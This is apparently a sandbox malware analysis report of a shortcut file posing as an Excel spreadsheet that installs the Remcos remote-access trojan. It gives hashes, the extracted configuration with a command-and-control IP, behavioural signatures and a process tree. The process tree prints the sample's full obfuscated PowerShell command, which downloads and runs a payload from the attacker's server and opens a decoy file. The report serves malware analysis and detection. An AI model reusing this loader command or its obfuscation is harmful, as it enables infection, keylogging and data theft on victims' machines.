Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
148s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30/08/2024, 11:11
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240704-en
General
-
Target
rv_luti_2024_roku.xlsx.lnk
-
Size
32KB
-
MD5
0ea3d54cecf6ea4d5e6739ffe9ce4be4
-
SHA1
513dca9cb690972319181c4f31ac98dcd80ea895
-
SHA256
ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03
-
SHA512
33826667e53d5cdb60ccfeb84a309059e20ce5da79d7dde853578fcea99b44d2a92debe4d6da65f463223b48d1b9f510bb0c9c3b26e7fb0b2a5199eb6ead45d2
-
SSDEEP
48:88muavUQSSesYOhI3YMEDo/i1xCoXEEDDo/L8A7NZdCZFXuGdZTa7x:88y8EesYeI3hX+xCRZR4uKQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4968 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 1172 Newfts.exe 2304 Newfts.exe -
Loads dropped DLL 8 IoCs
pid Process 1172 Newfts.exe 1172 Newfts.exe 1172 Newfts.exe 1172 Newfts.exe 2304 Newfts.exe 2304 Newfts.exe 2304 Newfts.exe 2304 Newfts.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2304 set thread context of 5100 2304 Newfts.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4920 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4968 powershell.exe 4968 powershell.exe 1172 Newfts.exe 2304 Newfts.exe 2304 Newfts.exe 5100 cmd.exe 5100 cmd.exe 5100 cmd.exe 5100 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2304 Newfts.exe 5100 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4968 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE 4920 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4740 wrote to memory of 4968 4740 cmd.exe 85 PID 4740 wrote to memory of 4968 4740 cmd.exe 85 PID 4968 wrote to memory of 1172 4968 powershell.exe 95 PID 4968 wrote to memory of 1172 4968 powershell.exe 95 PID 4968 wrote to memory of 1172 4968 powershell.exe 95 PID 4968 wrote to memory of 4920 4968 powershell.exe 97 PID 4968 wrote to memory of 4920 4968 powershell.exe 97 PID 4968 wrote to memory of 4920 4968 powershell.exe 97 PID 1172 wrote to memory of 2304 1172 Newfts.exe 96 PID 1172 wrote to memory of 2304 1172 Newfts.exe 96 PID 1172 wrote to memory of 2304 1172 Newfts.exe 96 PID 2304 wrote to memory of 5100 2304 Newfts.exe 98 PID 2304 wrote to memory of 5100 2304 Newfts.exe 98 PID 2304 wrote to memory of 5100 2304 Newfts.exe 98 PID 4920 wrote to memory of 3476 4920 EXCEL.EXE 104 PID 4920 wrote to memory of 3476 4920 EXCEL.EXE 104 PID 2304 wrote to memory of 5100 2304 Newfts.exe 98 PID 5100 wrote to memory of 1540 5100 cmd.exe 110 PID 5100 wrote to memory of 1540 5100 cmd.exe 110 PID 5100 wrote to memory of 1540 5100 cmd.exe 110 PID 5100 wrote to memory of 1540 5100 cmd.exe 110 PID 5100 wrote to memory of 1540 5100 cmd.exe 110
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo TeuldrVGQbKMoxomeUoWOqhwvLOxvRa; echo kHymKfRwuZXnxCZJgAfmykUgOsaYlqvqidzuAVdr; echo BzhKUakeDaTwVhpLOdFPPdFVoZgkSjggfDEAGyfrfJLDRccpyaIWIA; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo kUBgvnjkEnVVtBTakWaQxmlPinKUrVTnqYKyBiuNzxKhEEivsinzTrJtp; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo KXIRBZFhgPOZEKacAcLhfiuehKFFEsRDolDsCVbHJSxXKtveGjGXJJi; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo QnvQaCnoZGPZHtQIYplmH; s''t''a''rt rv_luti_2024_roku.xlsx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:1540
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:3476
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4412
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5c253ac4c2e9b1ea50c295a69934a6b71
SHA1ba80b35a4e53c34726bc24c58e7d08b2ce01cfca
SHA25653830e09dd6bd828ec6c700725946ffd836b5114f9702bb9be17bc4e056b075a
SHA512eb061afebd138c51ff25a39203b66a6cb97ddc267366b71f795a9cf9ef645dbc905edc1772714c51148a5b56f15d860538f64c16b377154abc724ba8fc66be51
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
374B
MD5b10dee105cdbe3e2d4eed0bff1bd4fa9
SHA1e21a70382f7de528f7ed7914c97ce8b80d1d1c0b
SHA2561426fa59c30f740c0bb1d56f0e4da65ba2c4c24038d0d2f13055495a7c4f28fe
SHA5125c3ec72c4bee05c2bb85334cea39c6606da7174bc9dc48539a2fe8464d057fc4c6a0a7883157e25d6b8554083da19d81bd7093c6e8a1fad3bd28674dc0ccc225
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD5d0f14522333f489d4fed683f64f0f12e
SHA193036d0978729264139ed97baceabca95af7ed80
SHA256ab2e42f9671e29fc719e4f835d8726a5d3890d1b06a93d093848c440fe562639
SHA51236fc63f3c4f87c84fa2217dcd5f7fb9cbb79ceda6246df3b26682e439bfb0216e807c0e35342750cc108069b3b6c39fdefa92431b60b7f6d2d16e2ebf60268c6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5939fce2123fbc7c6e63a1c8ed6bb10a6
SHA15729e5c73f9e31af5597fddbf6dbb9b2c4cd4773
SHA2562b852b6c3bf57a50406e70577008c1f25216f7eaecbcd0ac79f7f27191d8be07
SHA512d912ed3e44817a38413c3bfc43de0dc8d34690da3c36b4b7c4bb2ccb6e96bb730837553628e1da30124cc73fafbdcb412bc47a1fd897a7614d2a4508e06e488b
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
32KB
MD521046015d5d9ef5e536ac7643b1ab365
SHA1f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
SHA2567a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
SHA512d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e